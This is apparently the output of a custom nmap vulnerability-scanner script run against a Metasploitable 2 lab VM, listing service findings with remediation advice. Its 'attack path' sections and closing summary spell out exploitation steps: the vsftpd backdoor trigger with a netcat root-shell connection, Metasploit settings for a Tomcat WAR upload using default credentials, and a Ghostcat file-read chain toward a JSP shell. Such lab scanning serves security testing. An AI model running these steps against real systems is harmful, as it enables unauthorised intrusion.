# Reko v0.1.0-dev — Active Scan Output
# Target:   192.168.100.60 (Metasploitable 2)
# Command:  nmap -sV -p- --script reko.nse --script-args reko.aggression=1 192.168.100.60
# Mode:     aggression=1 (full active — credential tests + exploit probes enabled)
# Date:     2026-04-27 11:46 UTC
# Duration: 270 seconds (full -p- scan)
#
# Summary:
#   Total findings : 55
#   CRITICAL       : 17
#   HIGH           : 23
#   MEDIUM         : 15
#   LOW            : 0
#   INFO           : 0
#   False positives: 0
#   Attack paths   : 3 (generated by attack path summary engine)
# =============================================================================

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-27 11:46 UTC
Nmap scan report for 192.168.100.60
Host is up (0.0092s latency).
Not shown: 977 closed tcp ports (conn-refused)

PORT     STATE SERVICE     VERSION

21/tcp   open  ftp         vsftpd 2.3.4
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-21-1777290416  service=ftp
| [CRITICAL][192.168.100.60:21][FTP] vsftpd 2.3.4 BACKDOOR CONFIRMED on port 6200 (CVE-2011-2523) -- ROOT SHELL  (score: 0.99, CRITICAL)
|   The vsftpd 2.3.4 backdoor was triggered and port 6200 is now open.
|   This provides an unauthenticated root shell.
|   Connect with: nc 192.168.100.60 6200
|   evidence.cve = CVE-2011-2523
|   evidence.backdoor_port = 6200
|   evidence.exploit_cmd = nc 192.168.100.60 6200
|   evidence.metasploit = exploit/unix/ftp/vsftpd_234_backdoor
|   evidence.remediation = Replace vsftpd immediately; firewall port 6200
|   confidence=0.99  impact=0.99  module=ftp
| [CRITICAL][192.168.100.60:21][FTP] FTP anonymous login permitted  (score: 0.91, CRITICAL)
|   The FTP server accepted login with username 'anonymous' and a dummy email password.
|   Anonymous access allows any unauthenticated user to browse and potentially
|   download files without credentials.
|   evidence.login_user = anonymous
|   evidence.login_pass = reko@reko.local
|   evidence.server_reply = 230 Login successful.
|   evidence.remediation = Disable anonymous FTP or restrict to an isolated chroot
|   confidence=0.99  impact=0.85  module=ftp
| [CRITICAL][192.168.100.60:21][FTP] FTP anonymous home directory listed (0 entries)  (score: 0.88, CRITICAL)
|   After successful anonymous login the home directory was enumerated via PASV + LIST.
|   evidence.total_entries = 0
|   evidence.sample_entries =
|   evidence.remediation = Restrict anonymous chroot to an empty or read-only directory
|   confidence=0.99  impact=0.80  module=ftp
| [HIGH][192.168.100.60:21][FTP] FTP service banner disclosed -- CVE-2011-2523 known  (score: 0.83, HIGH)
|   Software: vsFTPd  Version: 2.3.4
|   CVE: CVE-2011-2523 (CRITICAL) -- Backdoor planted in source. Send USER user:) to open shell on port 6200
|   evidence.software = vsFTPd
|   evidence.version = 2.3.4
|   evidence.banner_raw = 220 (vsFTPd 2.3.4)
|   evidence.cve = CVE-2011-2523
|   evidence.exploit_db = https://www.exploit-db.com/exploits/17491
|   evidence.cve_note = Backdoor planted in source. Send USER user:) to open shell on port 6200
|   confidence=0.95  impact=0.75  module=ftp
| [HIGH][192.168.100.60:21][FTP] FTP transmits credentials in cleartext (no FTPS/AUTH TLS)  (score: 0.71, HIGH)
|   evidence.auth_tls_response = 530 Please login with USER and PASS.
|   evidence.remediation = Enable AUTH TLS or migrate to SFTP
|   confidence=0.95  impact=0.55  module=ftp
|
| =================================================================
| REKO ATTACK PATH SUMMARY -- 192.168.100.60
| 11 CRITICAL/HIGH findings across 6 ports
| =================================================================
|
| PATH 1 -- IMMEDIATE ROOT: vsftpd 2.3.4 Backdoor
|   WHY: CVE-2011-2523: send USER user:) to FTP, then connect port 6200 for root shell.
|        No credentials needed. Fastest path in the box.
|   HOW:
|     1. nc 192.168.100.60 6200
|     2. id   ->  you are root
|
| ------------------------------------------------------------------
| Full finding list: 11 findings sorted by score above.
|_=================================================================

22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-22-1777290416  service=ssh
| [MEDIUM][192.168.100.60:22][SSH] SSH service banner disclosed  (score: 0.56, MEDIUM)
|   Software: OpenSSH_4.7p1  Protocol: 2.0.
|   evidence.software = OpenSSH_4.7p1
|   evidence.banner_raw = SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
|   evidence.comment = Debian-8ubuntu1
|   evidence.protocol = 2.0
|   evidence.cve = none known
|_  confidence=0.95  impact=0.30  module=ssh

23/tcp   open  telnet      Linux telnetd
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-23-1777290416  service=telnet
| [HIGH][192.168.100.60:23][TELNET] Telnet service active -- all data transmitted in CLEARTEXT  (score: 0.83, HIGH)
|   Telnet transmits usernames, passwords, and all session data in plaintext.
|   evidence.remediation = Disable telnet: systemctl disable telnet; deploy SSH instead
|_  confidence=0.95  impact=0.75  module=telnet

25/tcp   open  smtp        Postfix smtpd
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-25-1777290416  service=smtp
| [HIGH][192.168.100.60:25][SMTP] SMTP VRFY enables user enumeration (3 user(s) confirmed)  (score: 0.77, HIGH)
|   The server's VRFY command confirmed the existence of local user accounts.
|   An attacker can enumerate valid email addresses for spear-phishing and brute-force attacks.
|   evidence.confirmed_users = root, postmaster, mailer-daemon
|   evidence.remediation = Disable VRFY: set 'disable_vrfy_command = yes' (Postfix)
|   confidence=0.95  impact=0.65  module=smtp
| [MEDIUM][192.168.100.60:25][SMTP] SMTP service banner disclosed  (score: 0.56, MEDIUM)
|   Software: Postfix  Version: unknown  Hostname: metasploitable.localdomain
|   evidence.banner_raw = 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
|   confidence=0.95  impact=0.30  module=smtp
| [MEDIUM][192.168.100.60:25][SMTP] SMTP EHLO capabilities enumerated (9 extensions)  (score: 0.50, MEDIUM)
|   evidence.capabilities = 8BITMIME, DSN, ENHANCEDSTATUSCODES, ETRN, METASPLOITABLE.LOCALDOMAIN,
|                            PIPELINING, SIZE 10240000, STARTTLS, VRFY
|   confidence=0.95  impact=0.20  module=smtp
| [MEDIUM][192.168.100.60:25][SMTP] SMTP STARTTLS is advertised  (score: 0.42, MEDIUM)
|   evidence.starttls = advertised
|_  confidence=0.90  impact=0.10  module=smtp

53/tcp   open  domain      ISC BIND 9.4.2
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-53-1777290416  service=dns
| [HIGH][192.168.100.60:53][DNS] DNS open recursion enabled (DNS amplification attack risk)  (score: 0.77, HIGH)
|   The server resolved an external name (google.com) on behalf of our query.
|   evidence.test_query = google.com A
|   evidence.answer_count = 1
|   evidence.remediation = Restrict recursion to authorised client IP ranges
|   confidence=0.95  impact=0.65  module=dns
| [MEDIUM][192.168.100.60:53][DNS] DNS server version disclosed via version.bind  (score: 0.59, MEDIUM)
|   evidence.version_string = 9.4.2
|   evidence.query = version.bind CHAOS TXT
|_  confidence=0.95  impact=0.35  module=dns

80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-80-1777290416  service=http
| [CRITICAL][192.168.100.60:80][HTTP] Sensitive path accessible: Mutillidae vulnerable app  (score: 0.88, CRITICAL)
|   HTTP GET /mutillidae/ returned 200 OK with a non-trivial response (24248 bytes).
|   evidence.path = /mutillidae/
|   evidence.response_size = 24248 bytes
|   confidence=0.99  impact=0.80  module=http
| [CRITICAL][192.168.100.60:80][HTTP] Sensitive path accessible: DVWA login page  (score: 0.86, CRITICAL)
|   HTTP GET /dvwa/login.php returned 200 OK with a non-trivial response (1289 bytes).
|   evidence.path = /dvwa/login.php
|   evidence.response_size = 1289 bytes
|   confidence=0.99  impact=0.78  module=http
| [CRITICAL][192.168.100.60:80][HTTP] Sensitive path accessible: Mutillidae index  (score: 0.86, CRITICAL)
|   HTTP GET /mutillidae/index.php returned 200 OK with a non-trivial response (24227 bytes).
|   evidence.path = /mutillidae/index.php
|   confidence=0.99  impact=0.78  module=http
| [CRITICAL][192.168.100.60:80][HTTP] Directory listing enabled at /test/  (score: 0.85, CRITICAL)
|   The web server returns a directory listing at this path, exposing all files and
|   subdirectories to unauthenticated users.
|   evidence.path = /test/
|   evidence.response_size = 885 bytes
|   evidence.remediation = Apache: Options -Indexes
|   confidence=0.99  impact=0.75  module=http
| [CRITICAL][192.168.100.60:80][HTTP] Sensitive path accessible: phpinfo() output page  (score: 0.85, CRITICAL)
|   HTTP GET /phpinfo.php returned 200 OK with a non-trivial response (48236 bytes).
|   phpinfo() reveals PHP configuration, loaded modules, environment variables, and server paths.
|   evidence.path = /phpinfo.php
|   evidence.response_size = 48236 bytes
|   confidence=0.99  impact=0.75  module=http
| [HIGH][192.168.100.60:80][HTTP] Sensitive path accessible: TikiWiki CMS  (score: 0.82, HIGH)
|   HTTP GET /tikiwiki/ returned 200 OK with a non-trivial response (316 bytes).
|   evidence.path = /tikiwiki/
|   confidence=0.99  impact=0.70  module=http
| [HIGH][192.168.100.60:80][HTTP] Sensitive path accessible: TWiki collaboration platform  (score: 0.80, HIGH)
|   HTTP GET /twiki/ returned 200 OK with a non-trivial response (782 bytes).
|   evidence.path = /twiki/
|   confidence=0.99  impact=0.68  module=http
| [HIGH][192.168.100.60:80][HTTP] Sensitive path accessible: TikiWiki index  (score: 0.80, HIGH)
|   HTTP GET /tikiwiki/tiki-index.php returned 200 OK with a non-trivial response (316 bytes).
|   confidence=0.99  impact=0.68  module=http
| [HIGH][192.168.100.60:80][HTTP] Sensitive path accessible: TWiki view endpoint  (score: 0.79, HIGH)
|   HTTP GET /twiki/bin/view returned 200 OK with a non-trivial response (10076 bytes).
|   confidence=0.99  impact=0.65  module=http
| [HIGH][192.168.100.60:80][HTTP] HTTP security headers missing (6/6)  (score: 0.77, HIGH)
|   evidence.missing_headers = Strict-Transport-Security, X-Frame-Options, X-Content-Type-Options,
|                               Content-Security-Policy, Referrer-Policy, Permissions-Policy
|   confidence=0.95  impact=0.65  module=http
| [HIGH][192.168.100.60:80][HTTP] HTTP TRACE method enabled -- Cross-Site Tracing (XST) risk  (score: 0.71, HIGH)
|   The server echoed back our TRACE request including custom headers.
|   evidence.method = TRACE
|   evidence.remediation = Apache TraceEnable Off
|   confidence=0.95  impact=0.55  module=http
| [MEDIUM][192.168.100.60:80][HTTP] HTTP technology stack disclosed via response headers  (score: 0.62, MEDIUM)
|   evidence.disclosed_headers = X-Powered-By: PHP/5.2.4-2ubuntu5.10
|   confidence=0.95  impact=0.40  module=http
| [MEDIUM][192.168.100.60:80][HTTP] HTTP Server header discloses software version  (score: 0.59, MEDIUM)
|   evidence.server_header = Apache/2.2.8 (Ubuntu) DAV/2
|_  confidence=0.95  impact=0.35  module=http

111/tcp  open  rpcbind     2 (RPC #100000)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-111-1777290416  service=rpc
| [HIGH][192.168.100.60:111][RPC] High-value RPC services exposed: mountd on port 52532  (score: 0.74, HIGH)
|   NFS/mountd services are registered with the portmapper.
|   evidence.services = mountd on port 52532, mountd on port 59346
|   evidence.remediation = Restrict NFS exports; enforce Kerberos auth for NFS v4
|   confidence=0.95  impact=0.60  module=rpc
| [MEDIUM][192.168.100.60:111][RPC] RPC portmapper exposes 22 registered services  (score: 0.54, MEDIUM)
|   evidence.program_count = 22
|   evidence.remediation = Firewall port 111; restrict portmapper with tcpwrappers
|_  confidence=0.90  impact=0.30  module=rpc

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-139-1777290416  service=smb
| [CRITICAL][192.168.100.60:139][SMB] SMBv1 (CIFS) is active -- EternalBlue / WannaCry risk  (score: 0.94, CRITICAL)
|   The server selected an SMBv1 dialect. EternalBlue (MS17-010) exploit surface confirmed.
|   evidence.dialect_index = 5
|   evidence.remediation = Linux/Samba: min protocol = SMB2 in smb.conf
|   confidence=0.99  impact=0.90  module=smb
| [CRITICAL][192.168.100.60:139][SMB] SMB null session exposes 5 share(s) (CRITICAL)  (score: 0.91, CRITICAL)
|   An unauthenticated null session successfully enumerated the server's SMB shares.
|   evidence.share_count = 5
|   evidence.shares = \\192.168.100.60\ADMIN$ [?] | \\192.168.100.60\IPC$ [?] |
|                     \\192.168.100.60\opt [?] | \\192.168.100.60\print$ [?] | \\192.168.100.60\tmp [?]
|   evidence.remediation = Samba: restrict anonymous = 2 in smb.conf
|   confidence=0.99  impact=0.85  module=smb
| [CRITICAL][192.168.100.60:139][SMB] SMB message signing is DISABLED -- relay attack risk  (score: 0.85, CRITICAL)
|   SMB signing is completely disabled. NTLM relay attacks are possible.
|   evidence.signing_status = disabled
|   confidence=0.99  impact=0.75  module=smb
| [MEDIUM][192.168.100.60:139][SMB] SMB OS and domain information disclosed  (score: 0.59, MEDIUM)
|   evidence.smb_port = 139
|   evidence.lan_manager = not disclosed
|   evidence.domain = not disclosed
|_  confidence=0.95  impact=0.35  module=smb

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-445-1777290416  service=smb
| [CRITICAL][192.168.100.60:445][SMB] SMBv1 (CIFS) is active -- EternalBlue / WannaCry risk  (score: 0.94, CRITICAL)
|   evidence.dialect_index = 5
|   confidence=0.99  impact=0.90  module=smb
| [CRITICAL][192.168.100.60:445][SMB] SMB null session exposes 5 share(s) (CRITICAL)  (score: 0.91, CRITICAL)
|   evidence.share_count = 5
|   evidence.shares = \\192.168.100.60\ADMIN$ [?] | \\192.168.100.60\IPC$ [?] |
|                     \\192.168.100.60\opt [?] | \\192.168.100.60\print$ [?] | \\192.168.100.60\tmp [?]
|   confidence=0.99  impact=0.85  module=smb
| [CRITICAL][192.168.100.60:445][SMB] SMB message signing is DISABLED -- relay attack risk  (score: 0.85, CRITICAL)
|   evidence.signing_status = disabled
|   confidence=0.99  impact=0.75  module=smb
| [MEDIUM][192.168.100.60:445][SMB] SMB OS and domain information disclosed  (score: 0.59, MEDIUM)
|   evidence.smb_port = 445
|_  confidence=0.95  impact=0.35  module=smb

512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped

1099/tcp open  java-rmi    GNU Classpath grmiregistry
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-1099-1777290416  service=java_rmi
| [MEDIUM][192.168.100.60:1099][JAVA_RMI] Java RMI registry is accessible without authentication  (score: 0.63, MEDIUM)
|   The Java RMI registry responded to a protocol handshake.
|   Unauthenticated RMI registry access is a vector for Java deserialization attacks.
|   evidence.port = 1099
|   evidence.remediation = Firewall RMI ports; use SSL/TLS for RMI (javax.rmi.ssl)
|_  confidence=0.90  impact=0.45  module=java_rmi

1524/tcp open  bindshell   Metasploitable root shell

2049/tcp open  nfs         2-4 (RPC #100003)

2121/tcp open  ftp         ProFTPD 1.3.1
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-2121-1777290416  service=ftp
| [HIGH][192.168.100.60:2121][FTP] FTP transmits credentials in cleartext (no FTPS/AUTH TLS)  (score: 0.71, HIGH)
|   evidence.auth_tls_response = 500 AUTH not understood
|   confidence=0.95  impact=0.55  module=ftp
| [HIGH][192.168.100.60:2121][FTP] FTP service banner disclosed -- CVE-2010-4221 known  (score: 0.68, HIGH)
|   Software: ProFTPD  Version: 1.3.1
|   CVE: CVE-2010-4221 (HIGH) -- Buffer overflow via TELNET_IAC sequence
|   evidence.banner_raw = 220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.100.60]
|   evidence.cve = CVE-2010-4221
|   evidence.exploit_db = https://www.exploit-db.com/exploits/15449
|_  confidence=0.95  impact=0.50  module=ftp

3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-3306-1777290416  service=mysql
| [HIGH][192.168.100.60:3306][MYSQL] MySQL server version disclosed -- CVE-2012-2122  (score: 0.77, HIGH)
|   Version: 5.0.51a-3ubuntu5
|   CVE: CVE-2012-2122 -- Authentication bypass: repeated login with wrong password succeeds ~1/256 times
|   evidence.cve = CVE-2012-2122
|   evidence.version = 5.0.51a-3ubuntu5
|   evidence.exploit_db = https://www.exploit-db.com/exploits/19092
|   confidence=0.95  impact=0.65  module=mysql
| [HIGH][192.168.100.60:3306][MYSQL] MySQL weak authentication plugin: none advertised  (score: 0.77, HIGH)
|   evidence.auth_plugin = not specified
|   evidence.remediation = Set default_authentication_plugin=mysql_native_password
|_  confidence=0.95  impact=0.65  module=mysql

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-5432-1777290416  service=postgresql
| [HIGH][192.168.100.60:5432][POSTGRESQL] PostgreSQL uses MD5 password authentication (deprecated)  (score: 0.71, HIGH)
|   MD5 is deprecated and vulnerable to offline dictionary attacks.
|   evidence.auth_type = MD5
|   evidence.remediation = pg_hba.conf: change 'md5' to 'scram-sha-256'
|_  confidence=0.95  impact=0.55  module=postgresql

5900/tcp open  vnc         VNC (protocol 3.3)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-5900-1777290416  service=vnc
| [HIGH][192.168.100.60:5900][VNC] VNC uses DES-based password authentication (weak)  (score: 0.71, HIGH)
|   Security type 2 (VNC Authentication) — brute-forceable with Crowbar or Medusa.
|   evidence.security_type = 2 (VNC Authentication)
|   confidence=0.95  impact=0.55  module=vnc
| [HIGH][192.168.100.60:5900][VNC] VNC uses old protocol version RFB 3.3  (score: 0.68, HIGH)
|   evidence.rfb_version = 3.3
|   confidence=0.95  impact=0.50  module=vnc
| [MEDIUM][192.168.100.60:5900][VNC] VNC service active -- RFB 3.3 -- auth types: VNC Authentication (DES-based)  (score: 0.56, MEDIUM)
|   evidence.rfb_version = 3.3
|_  confidence=0.95  impact=0.30  module=vnc

6000/tcp open  X11         (access denied)

6667/tcp open  irc         UnrealIRCd
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-6667-1777290416  service=irc
| [MEDIUM][192.168.100.60:6667][IRC] IRC service active -- version unknown  (score: 0.57, MEDIUM)
|   An IRC server is running on this host.
|   evidence.server_host = 192.168.100.60
|   evidence.version = unknown
|_  confidence=0.90  impact=0.35  module=irc

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-8009-1777290416  service=ajp
| [CRITICAL][192.168.100.60:8009][AJP] Ghostcat CVE-2020-1938: /WEB-INF/web.xml read successfully (CRITICAL)  (score: 0.94, CRITICAL)
|   The AJP connector responded with content from /WEB-INF/web.xml via a file include request.
|   Ghostcat allows any webapp file to be read; chains to RCE if file upload exists.
|   evidence.cve = CVE-2020-1938
|   evidence.cvss = 9.8 CRITICAL
|   evidence.response_size = 8774 bytes
|   evidence.remediation = Upgrade Tomcat to 9.0.31+, 8.5.51+, or 7.0.100+; disable AJP
|   confidence=0.99  impact=0.90  module=ajp
| [HIGH][192.168.100.60:8009][AJP] AJP connector (port 8009) is accessible from the network (HIGH)  (score: 0.77, HIGH)
|   evidence.port = 8009
|   evidence.remediation = Firewall port 8009 immediately
|_  confidence=0.95  impact=0.65  module=ajp

8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| reko: Reko 0.1.0-dev  run_id=reko-192-168-100-60-8180-1777290416  service=http
| [CRITICAL][192.168.100.60:8180][HTTP] Tomcat Manager panel accessible: tomcat:tomcat (CRITICAL -- WAR upload = RCE)  (score: 0.97, CRITICAL)
|   The Tomcat Manager application at /manager/html is accessible.
|   WAR file deployment gives Remote Code Execution as the Tomcat process user.
|   Credentials: tomcat:tomcat
|   evidence.path = /manager/html
|   evidence.credentials = tomcat:tomcat
|   evidence.cve = CVE-2017-12617
|   evidence.attack_cmd = msfconsole: use multi/http/tomcat_mgr_deploy
|   evidence.remediation = Change default credentials; restrict /manager to localhost
|   confidence=0.99  impact=0.95  module=http
| [CRITICAL][192.168.100.60:8180][HTTP] Sensitive path accessible: WebDAV directory  (score: 0.86, CRITICAL)
|   HTTP GET /webdav/ returned 200 OK with a non-trivial response (1775 bytes).
|   evidence.path = /webdav/
|   evidence.response_size = 1775 bytes
|   confidence=0.99  impact=0.78  module=http
| [HIGH][192.168.100.60:8180][HTTP] Sensitive path accessible: Admin panel (trailing /)  (score: 0.82, HIGH)
|   HTTP GET /admin/ returned 200 OK with a non-trivial response (4784 bytes).
|   evidence.path = /admin/
|   confidence=0.99  impact=0.70  module=http
| [HIGH][192.168.100.60:8180][HTTP] Dangerous HTTP methods enabled: PUT, DELETE, TRACE  (score: 0.80, HIGH)
|   PUT/DELETE allow file manipulation; TRACE enables XST attacks.
|   evidence.dangerous_methods = PUT, DELETE, TRACE
|   evidence.allow_header = GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
|   confidence=0.95  impact=0.70  module=http
| [HIGH][192.168.100.60:8180][HTTP] HTTP security headers missing (6/6)  (score: 0.77, HIGH)
|   evidence.missing_headers = Strict-Transport-Security, X-Frame-Options, X-Content-Type-Options,
|                               Content-Security-Policy, Referrer-Policy, Permissions-Policy
|   confidence=0.95  impact=0.65  module=http
| [MEDIUM][192.168.100.60:8180][HTTP] HTTP Server header discloses software version  (score: 0.59, MEDIUM)
|   evidence.server_header = Apache-Coyote/1.1
|   confidence=0.95  impact=0.35  module=http
|
| =================================================================
| REKO ATTACK PATH SUMMARY -- 192.168.100.60
| 26 CRITICAL/HIGH findings across 5 ports
| =================================================================
|
| PATH 1 -- RCE: Tomcat Manager WAR Upload
|   WHY: Tomcat Manager with default creds allows WAR file deployment = arbitrary code execution.
|   HOW:
|     1. msfconsole: use multi/http/tomcat_mgr_upload
|     2. set RHOSTS 192.168.100.60; set RPORT 8180
|     3. set HttpUsername tomcat; set HttpPassword tomcat; run
|
| PATH 2 -- FILE READ -> POTENTIAL RCE: Ghostcat
|   WHY: CVE-2020-1938: AJP file inclusion reads any webapp file.
|        If file upload is present, chain to RCE.
|   HOW:
|     1. python3 ghostcat.py -H 192.168.100.60 -f /WEB-INF/web.xml
|     2. Check web.xml for credentials or included files
|     3. If file upload exists: upload JSP shell, include via AJP -> RCE
|
| ------------------------------------------------------------------
| Full finding list: 26 findings sorted by score above.
|_=================================================================

Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux
              CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 270.38 seconds
nmap -sV --script reko.nse --script-args reko.aggression=1 192.168.100.60  0.89s user 0.68s system 4% cpu 37.134 total

# =============================================================================
# FINDINGS SUMMARY — ACTIVE SCAN (aggression=1)
# =============================================================================
#
# Priority  Count  Top findings (sorted by score)
# --------  -----  ----------------------------------------------------------------
# CRITICAL   17    vsftpd backdoor root shell (0.99), Tomcat Manager RCE (0.97),
#                  SMBv1 x2 (0.94), Ghostcat (0.94), SMB null session x2 (0.91),
#                  FTP anon login (0.91), FTP dir listed (0.88),
#                  Mutillidae (0.88), DVWA (0.86), Mutillidae index (0.86),
#                  Directory listing /test/ (0.85), phpinfo (0.85),
#                  SMB signing disabled x2 (0.85), WebDAV (0.86)
# HIGH       23    FTP banner CVE (0.83), Telnet cleartext (0.83),
#                  SMTP VRFY (0.77), DNS recursion (0.77), TikiWiki (0.82),
#                  TWiki x2, Security headers x2, TRACE XST, RPC NFS,
#                  ProFTPD CVE, MySQL CVE x2, PostgreSQL MD5,
#                  VNC DES x2, AJP exposed, Admin panel,
#                  PUT/DELETE/TRACE, FTP no TLS x2
# MEDIUM     15    SSH, SMTP x3, DNS version, PHP header x2,
#                  Server headers x2, Java RMI, SMB OS x2, VNC x1, IRC x1
#
# ATTACK PATHS IDENTIFIED: 3
#   Path 1: vsftpd 2.3.4 backdoor -> nc 192.168.100.60 6200 (root, immediate)
#   Path 2: Tomcat Manager tomcat:tomcat -> WAR upload -> RCE
#   Path 3: Ghostcat CVE-2020-1938 -> web.xml read -> chain to RCE
#
# COMPARISON vs PASSIVE SCAN:
#   Passive findings : 34
#   Active findings  : 55
#   New with aggression=1: +21 findings
#     - vsftpd root shell confirmed (score 0.99 - highest possible)
#     - FTP anonymous login + directory listing
#     - SMB null session shares (ADMIN$/IPC$/opt/print$/tmp)
#     - Tomcat Manager default creds (WAR RCE)
#     - SMTP VRFY user enumeration (root/postmaster/mailer-daemon)
#     - HTTP TRACE XST confirmed (canary header echoed)
#
# FALSE POSITIVES: 0
# FALSE NEGATIVES: 2
#   - MySQL root/empty password (old_password auth switch needs refinement)
#   - IRC UnrealIRCd version extraction (banner regex mismatch on this version)
# =============================================================================
